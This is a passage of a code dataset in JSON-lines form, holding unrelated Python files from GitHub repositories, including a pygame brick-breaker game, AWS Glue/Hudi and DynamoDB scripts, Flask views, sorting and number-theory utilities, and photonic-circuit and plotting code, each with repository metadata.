punteggio\r\n finale = score*lives#moltiplica il punteggio dei mattoncini con la vita \r\n screen.fill(bgcolour)\r\n fnt_score = pygame.font.SysFont(\"inkfree\", 30)\r\n surf_txt_score = fnt_score.render(\"Score: \" + str(finale), True, txtcolour)\r\n screen.blit(surf_txt_score, (450, 10))\r\n\r\n \r\n\r\n #stampa vite\r\n fnt_lives = pygame.font.SysFont(\"inkfree\", 30)\r\n surf_txt_lives = fnt_lives.render(\"Lives: \" + str(lives), True, txtcolour)\r\n screen.blit(surf_txt_lives, (20, 10))\r\n\r\n for i in range(0, len(wall.brickrect)):\r\n screen.blit(wall.brick, wall.brickrect[i]) \r\n\r\n #controllo del muro, se non c'è si ha vinto\r\n if wall.brickrect == []: \r\n screen.fill(bgcolour)\r\n screen.blit(WIN, (130, 50))\r\n fnt_score = pygame.font.SysFont(\"inkfree\", 40)\r\n surf_txt_score = fnt_score.render(\"Score: \" + str(finale), True, txtcolour)\r\n screen.blit(surf_txt_score, (260, 390))\r\n\r\n pygame.display.flip()\r\n \r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n \r\n screen.blit(ball, ballrect)\r\n screen.blit(bat, batrect)\r\n pygame.display.flip()\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n rm = Read_Microbit()\r\n rm.start()\r\n pygame.init()\r\n main()\r\n ","repo_name":"NicoCavaa/TPSIT2020-2021","sub_path":"PongBreak/PongBreak.py","file_name":"PongBreak.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37453067398","text":"try:\n import sys\n from pyspark.context import SparkContext\n from pyspark.sql.session import SparkSession\n from awsglue.context import GlueContext\n from awsglue.job import Job\n from awsglue.dynamicframe import DynamicFrame\n from pyspark.sql.functions import col, to_timestamp, monotonically_increasing_id, to_date, when\n from pyspark.sql.functions import *\n from awsglue.utils import getResolvedOptions\n from pyspark.sql.types import *\n from datetime import datetime, date\n import boto3\n from functools import reduce\n from pyspark.sql import Row\n\n import uuid\n from faker import Faker\nexcept Exception as e:\n print(\"Modules are missing : {} \".format(e))\n\n# Get command-line arguments\nargs = getResolvedOptions(\n sys.argv, [\n 'JOB_NAME',\n 'GLUE_DATABASE',\n 'GLUE_TABLE_NAME'\n ],\n)\n\nspark = (SparkSession.builder.config('spark.serializer', 'org.apache.spark.serializer.KryoSerializer') \\\n .config('spark.sql.hive.convertMetastoreParquet', 'false') \\\n .config('spark.sql.catalog.spark_catalog', 'org.apache.spark.sql.hudi.catalog.HoodieCatalog') \\\n .config('spark.sql.extensions', 'org.apache.spark.sql.hudi.HoodieSparkSessionExtension') \\\n .config('spark.sql.legacy.pathOptionBehavior.enabled', 'true').getOrCreate())\n\n# Create a Spark context and Glue context\nsc = spark.sparkContext\nglueContext = GlueContext(sc)\njob = Job(glueContext)\nlogger = glueContext.get_logger()\njob.init(args[\"JOB_NAME\"], args)\n\ndb_name = args['GLUE_DATABASE']\ntable_name = args['GLUE_TABLE_NAME']\n\nquery_show_commits = f\"call show_commits('{db_name}.{table_name}', 5)\"\nspark_df_commits = spark.sql(query_show_commits)\ncommits = list(map(lambda row: row[0], spark_df_commits.collect()))\n\nquery_save_point = f\"call create_savepoint('{db_name}.{table_name}', '{commits[0]}')\"\nexecute_save_point = spark.sql(query_save_point)\n\nshow_check_points_query = f\"call show_savepoints('{db_name}.{table_name}')\"\nshow_check_points_query_df = spark.sql(show_check_points_query)\n\nprint(f\"\"\"\n**************************STATS**********************************\nquery {query_show_commits}\nspark_df {spark_df_commits.show()}\ncommits {commits}\nLatest commit: {commits[0]}\n\n########################### Save Points ##########################\nquery: {query_save_point}\nsave_point {execute_save_point.show()}\n\n##################### ###### SHOW CHECK POINT ######################\nquery: {show_check_points_query}\nshow_check_points_query_df {show_check_points_query_df.show()}\n*********************************************************************\n\"\"\")\n","repo_name":"nfarah86/aws-hudi-ride-share-workshop","sub_path":"infrastructure/GLueJobs/save_points.py","file_name":"save_points.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"71183835970","text":"import sys\ninput = sys.stdin.readline\nt = int(input()) \nfor _ in range(t):\n n = int(input())\n l = list(map(int, input().rstrip().split()))\n l.sort()\n MIN = l[0]\n for i in range(1, n):\n MIN = max(MIN, l[i]-l[i-1])\n print(MIN)","repo_name":"kimjngyun/cofo","sub_path":"Rounds/R753D3/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2962710448","text":"import boto3\nfrom decouple import config\n\n#import the credentials to our python file\nAWS_ACCESS_KEY_ID = config(\"AWS_ACCESS_KEY_ID\")\nAWS_SECRET_ACCESS_KEY = config(\"AWS_SECRET_ACCESS_KEY\")\nREGION_NAME = config(\"REGION_NAME\")\n\n#Set Client and Resource\nclient = boto3.client(\n 'dynamodb',\n aws_access_key_id = AWS_ACCESS_KEY_ID,\n aws_secret_access_key = AWS_SECRET_ACCESS_KEY,\n region_name = REGION_NAME,\n)\nresource = boto3.resource(\n 'dynamodb',\n aws_access_key_id = AWS_ACCESS_KEY_ID,\n aws_secret_access_key = AWS_SECRET_ACCESS_KEY,\n region_name = REGION_NAME,\n)\n\n#instantiate table in dynamo\nProduct_Table = resource.Table('products')\n\n\n\n#POST method\ndef add_product(id, name, price):\n response = Product_Table.put_item(\n Item = {\n 'id' : id,\n 'name' : name,\n 'price' : price,\n }\n )\n return response\n \n#GET method\ndef get_product(id):\n response = Product_Table.get_item(\n Key = {\n 'id' : id\n },\n AttributesToGet=[\n 'name', \n 'price'\n ]\n )\n return response\n \n#PUT method\ndef update_product(id, data:dict):\n response = Product_Table.update_item(\n Key = {\n 'id': id\n },\n AttributeUpdates={\n 'name': {\n 'Value' : data['name'],\n 'Action' : 'PUT' \n },\n 'price': {\n 'Value' : data['price'],\n 'Action' : 'PUT'\n }\n },\n ReturnValues = \"UPDATED_NEW\" \n )\n return response\n\n#DELETE method\ndef delete_product(id):\n response = Product_Table.delete_item(\n Key = {\n 'id': id\n }\n )\n return response","repo_name":"AsaelSolorio/AWS-lambda-Api-serverless","sub_path":"dynamodb_handler.py","file_name":"dynamodb_handler.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"43847404445","text":"from urllib.request import Request\nfrom flask import render_template,request,redirect,url_for\nfrom . import main\nfrom ..models import Source, Article\nfrom ..requests import get_sources, get_source, get_topheadlines\nfrom app import requests\n\n# Views\n@main.route('/', methods=[\"POST\", \"GET\"])\ndef index():\n '''\n View root page function that returns the index page and its data\n '''\n \n news_sources = get_sources()\n\n \n title = 'Home - News Sources'\n\n if request.method==\"POST\":\n search = request.form['article_query']\n search = search.replace(\" \", '-');\n trending = get_topheadlines(search)\n return render_template('index.html', title = title, sources = news_sources, trending=trending)\n else:\n search='kenya'\n trending = get_topheadlines(search)\n return render_template('index.html', title = title, sources = news_sources, trending=trending)\n\n \n \n\n@main.route('/source/')\ndef source(id):\n '''\n View source page function that returns the news_sourcesindex page and its data\n '''\n news_sources = get_sources()\n source_details = get_source(id)\n title = 'Source - '+id\n source = id.upper()\n\n return render_template('source.html',sources = news_sources, source=source, source_details=source_details)\n\n\n@main.route('/404')\ndef article():\n '''\n View source page function that returns the index page and its data\n '''\n return render_template('404.html')","repo_name":"k-koech/flask_newsAPI","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13521439362","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 3 22:47:55 2020\n\n@author: Do Quang Tuan\n\"\"\"\nfrom modular.extendedGCD import extendedGCD\nfrom prime.isPrime import isPrime\n\ndef modularInverse(a, n):\n assert(extendedGCD(a, n) == 1)\n \n s = 0\n t = 1\n r = n \n old_s = 1\n old_t = 0\n old_r = a\n \n while r != 0:\n quotient = old_r // r\n old_r, r = r, old_r - quotient * r\n old_s, s = s, old_s - quotient * s\n old_t, t = t, old_t - quotient * t\n \n if old_s < 0:\n old_s = n + old_s\n \n return old_s","repo_name":"dqtuan99/information-security","sub_path":"modular/modularInverse.py","file_name":"modularInverse.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22441366295","text":"class MergeSort:\n \"\"\"Merge sort implementation.\"\"\"\n\n def __init__(self, a_list):\n \"\"\"Initializing the list\"\"\"\n self.a_list = a_list\n\n def sort(self, a_list=None):\n \"\"\"Merge sort follows divide and conquer strategy. This is the best\n performing sorting algorithm used. The time complexity is O(n log n)\n unlike quick sort whose time complexity fluctuates because of pivot\n element selection.\n\n The drawback with the below implementation is that it uses additional\n storage while dividing and merging.\n\n :param a_list- The list to be sorted. If the list is not passed in\n as argument global list will be considered\n :returns - Sorted List\n \"\"\"\n a_list = self.a_list if a_list is None else a_list\n\n if len(a_list) > 1:\n middle = len(a_list) // 2\n\n left = a_list[:middle]\n right = a_list[middle:]\n self.sort(left)\n self.sort(right)\n\n i, j, k = 0, 0, 0\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n a_list[k] = left[i]\n i += 1\n else:\n a_list[k] = right[j]\n j += 1\n k += 1\n\n while i < len(left):\n a_list[k] = left[i]\n i += 1\n k += 1\n\n while j < len(right):\n a_list[k] = right[j]\n j += 1\n k += 1\n\n return a_list\n\n\n def better_sort(self, first, last):\n\n if first < last:\n middle = len(self.a_list[first:last]) // 2\n self.merge(self.better_sort(first, middle),\n self.better_sort(middle + 1), last)\n return self.a_list\n\n def merge(self):\n pass","repo_name":"Sriee/epi","sub_path":"data_structures/sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"538450171","text":"#!/usr/bin/env python\n\nimport re\nfrom math import sqrt\nimport numpy as np\nimport warnings\n\ndef latex_float(f):\n float_str = \"{0:.2g}\".format(f)\n if \"e\" in float_str:\n base, exponent = float_str.split(\"e\")\n return r\"{0} \\times 10^{{{1}}}\".format(base, int(exponent))\n else:\n return float_str\n\n\n# ---- Latex tools -----\n\ndef bracket_block(text):\n \"\"\"\n finds start and end of the first bracketed block\n \"\"\"\n\n istart=text.find('(')\n\n cursor=istart\n\n if cursor != -1:\n\n counter=1\n while (cursor0:\n cursor+=1\n if text[cursor]=='(':\n counter += 1\n elif text[cursor]==')':\n counter -= 1 \n\n return istart, cursor\n\n\ndef nw_split(text):\n \n istart,iend=bracket_block(text)\n if istart == -1:\n return text.split(',')\n else:\n # include the opcode at the end\n result=[text[istart:iend+2],]\n\n if iend0:\n # preceding text does not contain brackets by construction\n # so can be readily included without further special splitting\n result = text[:istart-1].split(',') + result\n\n return result\n\n\n\ndef node2Latex(node, index_start=1):\n\n\n pieces = {}\n output = '**** LATEX *******\\n\\n'\n \n for i, child in enumerate(node.children):\n output += '$ \\\\dot{S_%d} = %s $ \\\\newline \\\\newline \\n'%(i+1,child.to_latex())\n\n\n\n return output\n\n\ndef newick2Latex(text, index_start=1, SPACEDIM=2):\n\n try:\n node=Node.from_newick(text)\n SPACEDIM = len(node.children)\n except:\n warnings.warn('Tree cannot be parsed using Node.from_newick. Leaving SPACEDIM = %d'%SPACEDIM)\n SPACEDIM = 2\n\n\n if ' ' in text:\n raise ValueError(\"No spaces allowed in tree string %s\"%text)\n\n pieces = {}\n output = '**** LATEX *******\\n\\n'\n \n output += '$ \\\\dot{S} = %s $ \\\\newline \\\\newline \\n'%newick2human(text,pieces, index_start=index_start, SPACEDIM=SPACEDIM)\n\n coef_list = pieces.items()\n coef_list.sort()\n\n # list coeficients (constants) in Latex\n for coef_tuple in coef_list:\n output += '$ %s = %s $ \\\\newline \\n'%(coef_tuple[0],coef_tuple[1])\n\n\n output += '\\n**** END LATEX *******\\n\\n'\n\n # list them again for copy paste into Python\n for coef_tuple in coef_list:\n output += '%s = %s\\n'%(coef_tuple[0],coef_tuple[1])\n\n\n return output\n\ndef newick2human(text, pieces = None, SPACEDIM=2, index_start=1,dtype=float):\n\n strings = {'V':'[' + ',\\n '.join(['%s']*SPACEDIM) + ']','A':'%s + %s','S':'%s - %s','M':'(%s) (%s)','D':'(%s) / (%s)','Q': '\\sqrt{%s}','I':'%s $ for $ %s>0 $ and $ %s $ otherwise $ ', 'T':'tanh(%s)'}\n\n leaf_ops = {'Q':'\\sqrt','E':'e','O':'1/','T':'tanh','L':'log'}\n\n if pieces == None:\n pieces = {}\n\n if '(' in text:\n opcode = text[-1]\n childrentext = text[1:-2]\n\n childtexts = nw_split(childrentext)\n\n if (opcode == 'Q') and ('(' not in childtexts[0]) and ('p' not in childtexts[0]):\n newvarname='c_%d'%len([el for el in pieces if 'c' in el])\n pieces[newvarname] = '%.2e'%sqrt(dtype(childtexts[0]))\n return newvarname\n# print strings[opcode]\n# print tuple([newick2human(ct) for ct in childtexts])\n\n if (opcode == 'I'):\n# print [el for el in pieces if 'a' in el], len([el for el in pieces if 'a' in el])\n newvarname='a_%d'%len([el for el in pieces if 'a' in el])\n pieces[newvarname] = 'placeholder'\n\n pieces[newvarname] = strings[opcode]%tuple([newick2human(text=ct,pieces=pieces,SPACEDIM=SPACEDIM, index_start=index_start,dtype=dtype) for ct in [childtexts[1], childtexts[0],childtexts[2] ] ])\n\n return newvarname\n\n return strings[opcode]%tuple([newick2human(text=ct,pieces=pieces,SPACEDIM=SPACEDIM, index_start=index_start,dtype=dtype) for ct in childtexts])\n\n else:\n \n if text in leaf_ops:\n return leaf_ops[text]\n\n if 'p' in text:\n if text[1:] in [str(e) for e in range(SPACEDIM)]:\n return 'S_%d'%(int(text[1:])+index_start)\n else:\n return 'f_%d'%(int(text[1:])-SPACEDIM+index_start)\n else:\n newvarname='c_%d'%(len([el for el in pieces if 'c' in el])+index_start)\n pieces[newvarname] = '%.5e'%dtype(text)\n return newvarname\n\n# -------- end Latex tools -----\n\n\ndef parse_params_tree_str(tree_str, dtype=float):\n\n S_init_array = None\n scalars = None\n\n tree_str = re.sub('\\s+',' ',tree_str).strip()\n\n L = tree_str.split(\" \")\n \n if L:\n tree = L.pop()\n else:\n raise Exception(\"Provide at least a tree string.\")\n\n if L:\n S_init_array = np.array( [dtype(e) for e in L.pop().strip(\"()\").split(\",\") ] )\n\n if L:\n scalars = np.array( [dtype(e) for e in L.pop().strip(\"()\").split(\",\") ] )\n\n return (tree, S_init_array, scalars )\n \n\ndef protected_mem(i,numpar,spacedim=6):\n\n if inumpar-7):\n i=numpar-7\n\n return i;\n\n\ndef nopFun(reg):\n return 0\n\ndef addFun(reg,x,y):\n\n return x + y\n\ndef subFun(reg,x,y):\n\n return x - y\n\ndef mulFun(reg,x,y):\n\n return x * y\n\ndef ifFun(reg,x,y,z):\n\n if (x>0):\n return y\n else:\n return z\n\ndef isgreaterFun(reg,x,y):\n\n if (x>y):\n return 1\n else:\n return 0\n\n\ndef iseqFun(reg, x,y):\n\n if (x==y):\n return 1\n else:\n return 0\n\n\ndef copyFun(reg,x,y):\n\n reg[protected_mem(x,len(reg))] = reg[y%len(reg)] \n\n return x\n\ndef storeFun(reg,x,y):\n\n reg[protected_mem(y,len(reg))] = x\n\n return x\n\ndef ldaFun(reg,x):\n\n return reg[x%len(reg)] \n\n\ndef lda_xFun(reg,x):\n\n return reg[(x+reg[len(reg)-6])%len(reg)] \n\ndef ldxFun(reg, x,y):\n\n reg[len(reg)-6] = reg[y%len(reg)] \n\n return x\n\ndef sta_xFun(reg,x,y):\n\n reg[protected_mem(y+reg[len(reg)-6],len(reg))] = x\n\n return x\n\ndef stxFun(reg,x,y):\n\n reg[protected_mem(y,len(reg))] = reg[len(reg)-6] \n\n return x\n\ndef inxFun(reg,x):\n\n reg[len(reg)-6] += 1\n# if (reg[len(reg)-6] >= len(reg)):\n# reg[len(reg)-6] -= len(reg)\n\n reg[len(reg)-6] = reg[len(reg)-6]%len(reg)\n\n return x\n\ndef dexFun(reg,x):\n\n reg[len(reg)-6] -= 1\n if (reg[len(reg)-6] < len(reg)):\n reg[len(reg)-6] = 0\n\n return x\n\n\ndef reverse_sign(op_sign):\n \n if (op_sign == '+'):\n \n return '-'\n else:\n return '+'\n\nfuncs = {'A':addFun, 'S':subFun,'M':mulFun,'I':ifFun, 'G':isgreaterFun, 'E':iseqFun, 'N':copyFun,'R':storeFun,\n 'L':ldaFun, 'l':lda_xFun, 'X':ldxFun, 's':sta_xFun, 'x':stxFun, 'i':inxFun, 'd':dexFun}\n\n\nadditive = {'A':'+','S':'-'}\nmultiplicative = {'M':'','S':'/'}\n\nfunctions = {'T':'tanh(%s)','Q':'\\sqrt(%s)'}\n\n\nclass Node(object):\n\n\n# strings = {'V':'[' + ', '.join(['%s']*SPACEDIM) + ']','A':'%s + %s','S':'%s - %s','M':'(%s) (%s)','D':'(%s) / (%s)','Q': '\\sqrt{%s}','I':'%s $ for $ %s>0 $ and $ %s $ otherwise $ ', 'T':'tanh(%s)'}\n\n# leaf_ops = {'Q':'\\sqrt','E':'e','O':'1/','T':'tanh','L':'log'}\n\n\n\n\n\n\n def __repr__(self):\n return self.op\n\n def __init__(self,op,children=[], op_table = {'A':'+'}): \n\n self.op = op\n self.children = children\n\n\n def __call__(self, reg):\n return funcs[self.op](reg,*[c(reg) for c in self.children])\n\n @classmethod\n def from_newick(cls,text,dtype=float):\n\n if '(' in text:\n opcode = text[-1]\n childrentext = text[1:-2]\n\n childtexts = nw_split(childrentext)\n \n return cls(opcode, [cls.from_newick(ct,dtype=dtype) for ct in childtexts])\n else:\n if 'p' in text:\n return ParamNode(int(text[1:]))\n elif 'T' in text:\n return Node(text,[])\n else:\n return ConstNode(dtype(text))\n\n def walk(self,indent=0):\n\n print (' '*indent) + self.__repr__()\n for c in self.children:\n c.walk(indent+1)\n\n\n def mbrack(self):\n\n if self.op in functions:\n return self.to_latex()\n\n if self.__class__ is TermNode:\n return self.to_latex()\n\n if self.children:\n return '(%s)'%self.to_latex()\n else:\n return self.to_latex()\n\n\n def to_latex(self):\n\n \n if self.op in additive:\n op_sign = additive[self.op]\n# if isinstance(self.children[1],ConstNode):\n# if (self.children[1].value < 0):\n# op_sign = reverse_sign(op_sign)\n\n return ' '.join([self.children[0].to_latex(), op_sign , self.children[1].to_latex() ] ).replace('+ -','- ')\n elif self.op in multiplicative:\n return ' '.join([self.children[0].mbrack(), multiplicative[self.op] , self.children[1].mbrack() ] )\n elif self.op in functions:\n return functions[self.op]%self.children[0].to_latex()\n else:\n return '%s'%self\n\n\n def is_equal(self, other):\n\n if (self.op != other.op):\n return False\n\n elif (len(self.children) > 0):\n return reduce( lambda x,y: x and y, [e.is_equal(other.children[i]) for i, e in enumerate(self.children) ] )\n else:\n\n return True\n\n\n def distance(self, other, d=0):\n\n if (other is None):\n\n d += 1 \n for c in self.children:\n d = c.distance(None,d)\n \n return d\n\n\n if (self.op != other.op):\n d += 1\n\n if (len(other.children) > len(self.children) ):\n left = other\n right = self\n\n else:\n left = self\n right = other \n\n m = min( len(left.children), len(right.children) )\n \n for i in range(m):\n\n d = left.children[i].distance(right.children[i],d)\n\n for i in range( len(left.children) -m ):\n d = left.children[i].distance(None,d)\n\n return d\n\n\nclass TermNode(Node):\n \"\"\"\n Terminal node\n \"\"\"\n\n def distance(self, other, d=0):\n\n if (other is None):\n \n return d+1\n\n elif (not isinstance(other,self.__class__)):\n\n d += 1 # account for node\n\n for e in other.children:\n d = e.distance(None,d)\n\n elif not self.is_equal(other):\n d += 1\n\n return d\n\nclass ParamNode(TermNode):\n\n\n def __repr__(self):\n return \"S_%d\"%(self.index+1)\n\n def __init__(self,index ): \n\n self.op = 'P'\n self.children = []\n self.index = index;\n\n def __call__(self, reg):\n\n try:\n return reg[self.index]\n except:\n raise Exception(\"error fetching p node: index=%d vs len(reg)=%d\\n\"%(self.index,len(reg)))\n\n\n def is_equal(self, other):\n\n return isinstance(other,self.__class__) and (self.index == other.index)\n\n\n\nclass ConstNode(TermNode):\n\n def __repr__(self, dtype=float):\n if dtype is float:\n return latex_float(self.value)\n else:\n return '%d'%self.value\n\n def __init__(self,value ): \n\n self.op = 'C'\n self.children = []\n self.value = value;\n\n def __call__(self, reg):\n return self.value\n\n def is_equal(self, other):\n\n return isinstance(other,self.__class__) and (self.value == other.value)\n\n\n","repo_name":"wsijp/NextGen-GP","sub_path":"treetools.py","file_name":"treetools.py","file_ext":"py","file_size_in_byte":10490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33231373361","text":"#!/bin/python3\n\nfrom gpiozero import LED\nfrom time import sleep\n\n\nLED_GPIO = 19\nPERIOD = 1\n\nif __name__ == \"__main__\":\n led = LED(LED_GPIO)\n while True:\n led.on()\n sleep(PERIOD)\n led.off()\n sleep(PERIOD)\n","repo_name":"ENACRobotique/robot_rpi_2023","sub_path":"services/heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33230749284","text":"import numpy as np\nfrom tabulate import tabulate\nimport copy\n\nfrom perceval.utils.format import simple_float\nfrom perceval.utils.statevector import BasicState\n\n\nclass CircuitAnalyser:\n def __init__(self, simulator, input_states, output_states=None, mapping=None, post_select_fn=None):\n \"\"\"\n Initialization of Circuit Analyzer\n `simulator` is a simulator instance initialized for the circuit\n `input_states` is a list of FockStates or a mapping fockstate => name\n `output_states` is a list of FockState or a mapping fockstate => name, if missing input is taken,\n if \"*\" all possible target states are generated\n `mapping` is a mapping of FockState => name for display\n `post_select_fn` is a post selection function\n \"\"\"\n self._simulator = simulator\n if mapping is None:\n self._mapping = {}\n else:\n self._mapping = mapping\n if isinstance(input_states, dict):\n self.input_states_list = []\n for k, v in input_states.items():\n self._mapping[k] = v\n self.input_states_list.append(k)\n else:\n self.input_states_list = input_states\n for input_state in self.input_states_list:\n assert isinstance(input_state, BasicState), \"input_states should be BasicStates\"\n assert input_state.m == simulator.m, \"incorrect BasicState\"\n if output_states is None:\n self.output_states_list = self.input_states_list\n elif output_states == \"*\":\n outs = set()\n self.output_states_list = []\n explored_n = set()\n for input_state in self.input_states_list:\n if input_state.n in explored_n:\n continue\n explored_n.add(input_state.n)\n for output_state in simulator.allstate_iterator(input_state):\n if post_select_fn is None or post_select_fn(output_state):\n if output_state not in outs:\n outs.add(output_state)\n self.output_states_list.append(copy.copy(output_state))\n elif isinstance(output_states, dict):\n self.output_states_list = []\n for k, v in output_states.items():\n self._mapping[k] = v\n self.output_states_list.append(k)\n else:\n self.output_states_list = output_states\n self._post_select_fn = post_select_fn\n self.performance = None\n self.error_rate = None\n self._distribution = None\n\n def compute(self, normalize=False, expected=None):\n \"\"\"\n Go through the input states, generate (post-selected) output states and calculate if provided\n distance with expected\n \"\"\"\n self._distribution = np.zeros((len(self.input_states_list), len(self.output_states_list)))\n if expected is not None:\n self._expected_distribution = np.zeros((len(self.input_states_list), len(self.output_states_list)))\n self.performance = 1\n self.error_rate = 0\n for iidx, istate in enumerate(self.input_states_list):\n sump = 1e-6\n if expected is not None:\n if istate in expected:\n expected_o = expected[istate]\n elif istate in self._mapping and self._mapping[istate] in expected:\n expected_o = expected[self._mapping[istate]]\n if not isinstance(expected_o, BasicState):\n for k, v in self._mapping.items():\n if v == expected_o:\n expected_o = k\n break\n self._expected_distribution[iidx, self.output_states_list.index(expected_o)] = 1\n for oidx, ostate in enumerate(self.output_states_list):\n if self._post_select_fn is None or self._post_select_fn(ostate):\n if istate.n == ostate.n:\n self._distribution[iidx, oidx] = self._simulator.prob(istate, ostate)\n if expected is not None and self._expected_distribution[iidx, oidx]:\n found_in_row = self._distribution[iidx, oidx]\n if self._distribution[iidx, oidx] < self.performance:\n self.performance = self._distribution[iidx, oidx]\n sump += self._distribution[iidx, oidx]\n if normalize or expected is not None:\n self._distribution[iidx, :] /= sump\n if expected is not None:\n self.error_rate += 1-found_in_row/sump\n if expected is not None:\n self.error_rate /= len(self.input_states_list)\n return self\n\n def pdisplay(self, output_format=\"text\", nsimplify=True, precision=1e-6):\n if self._distribution is None:\n self.compute()\n d = []\n for iidx, _ in enumerate(self.input_states_list):\n d.append([simple_float(f, nsimplify=nsimplify, precision=precision)[1]\n for f in list(self._distribution[iidx])])\n return tabulate(d, headers=[self._mapping.get(o, str(o)) for o in self.output_states_list],\n showindex=[self._mapping.get(i, str(i)) for i in self.input_states_list],\n tablefmt=output_format == \"text\" and \"pretty\" or output_format)\n\n @property\n def distribution(self):\n return self._distribution\n","repo_name":"Elian-OR/Perceval","sub_path":"perceval/components/analyser.py","file_name":"analyser.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"70230648770","text":"import numpy as np\nfrom scipy import spatial\nimport networkx as nx\nimport os\nimport pickle\n\ndef process_title(title):\n return [w.replace('(', '').replace(')','').lower() for w in title.split('_')]\n\n'''\nData\n'''\n\ndata_path = 'data'\ndef load_graph():\n '''\n Loads the Wikipedia subgraph and the translation dictionaries.\n\n @Returns:\n graph... networkx graph\n idx2word... dictionary (key=index, value=word)\n word2idx... dictionary (key=word, value=idx)\n '''\n\n graph = nx.read_gpickle(os.path.join(data_path, 'wales', 'wiki_graph.p'))\n with open(os.path.join(data_path, 'wales', 'idx2name.p'), 'rb') as handle:\n idx2word = pickle.load(handle)\n with open(os.path.join(data_path, 'wales', 'name2idx.p'), 'rb') as handle:\n word2idx = pickle.load(handle) \n return graph, idx2word, word2idx\n\ndef load_challenges():\n '''\n Loads scraped Wikirace challenges.\n\n @Returns:\n challenges... list of word tuples\n '''\n\n challenges = []\n with open(os.path.join(data_path, 'wales', 'challenges.txt'), 'r') as inf:\n lines = inf.readlines()\n for line in lines:\n s, t = line.replace('\\n', '').split('\\t')\n challenges.append((s,t))\n return challenges\n\ndef load_embedding(emb_file):\n with open(os.path.join('data', 'embeddings', emb_file), 'rb') as handle:\n emb_dict = pickle.load(handle)\n return emb_dict\n\n'''\nDistance Functions\n'''\n\ndef cosine_dist(v1, v2):\n '''\n Cosine distance between two vectors.\n\n @Params:\n v1... vector 1\n v2... vector 2\n @Returns:\n 1-cossim\n '''\n\n d = spatial.distance.cosine(v1, v2)\n if np.isnan(d) or np.all(v1==0) or np.all(v2==0):\n return np.inf\n else:\n return d\n\ndef cosine_dist_parallel(V, v):\n '''\n Parallel cosine distance between batch of vectors and a vector.\n\n @Params:\n V... batch of vectors (n x d)\n v... vector (d)\n @Returns:\n 1-cossim between each vector in batch and v\n '''\n\n mask = np.sum((V!=0), axis=1)==0\n tmp = V@v\n tmp[mask] = np.inf\n tmp[~mask] = 1 - tmp[~mask]/(np.linalg.norm(V[~mask,:], axis=1) * np.linalg.norm(v))\n return tmp","repo_name":"kahlmeyer94/WALES","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"21144859042","text":"import logging\nfrom random import choice\nfrom flask import Flask, request\n\nclass TransactionIDContextFilter(logging.Filter):\n \"\"\"\n This is a filter which injects contextual information into the log.\n\n Rather than use actual contextual information, we just use random\n data in this demo.\n \"\"\"\n\n USERS = ['jim', 'fred', 'sheila']\n IPS = ['123.231.231.123', '127.0.0.1', '192.168.0.1']\n\n def filter(self, record):\n\n record.ip = choice(TransactionIDContextFilter.IPS)\n record.user = choice(TransactionIDContextFilter.USERS)\n return True\n\nif __name__ == '__main__':\n levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR, logging.CRITICAL)\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)-15s %(name)-5s %(levelname)-8s IP: %(ip)-15s User: %(user)-8s %(message)s')\n a1 = logging.getLogger('a.b.c')\n\n a1.addFilter(TransactionIDContextFilter())\n a1.debug('A debug message')\n a1.info('An info message with %s', 'some parameters')\n","repo_name":"ibm-cloud-architecture/build-to-manage","sub_path":"DistributedTrace/python/service3/logtest.py","file_name":"logtest.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"43"} +{"seq_id":"41953848880","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nbase_dir = \"trajectories/\"\nif __name__==\"__main__\":\n\n\n plts = []\n legends = [\"Single-target Planner\",\"Multi-target Planner\"]\n line_style = [\"b\", \"r\",\"k\",\"m\",\"c\"]\n\n for index in range(0,5):\n pcrlb_file = base_dir + \"pcrlb_single_\" + str(index) + \".txt\"\n error_file = base_dir+\"average_error_\"+str(index)+\".txt\"\n pclb = []\n with open(pcrlb_file, \"r\") as f:\n for line in f:\n data = line.strip()\n pclb.append(float(data))\n\n if index==3 or index==4:\n plt1, = plt.plot(range(1, len(pclb) + 1), pclb, line_style[index-3], linewidth=2)\n plts.append(plt1)\n\n error = []\n with open(error_file, \"r\") as f:\n for line in f:\n data = line.strip()\n error.append(float(data))\n\n #plt2, = plt.plot(range(1, len(pclb) + 1), error, 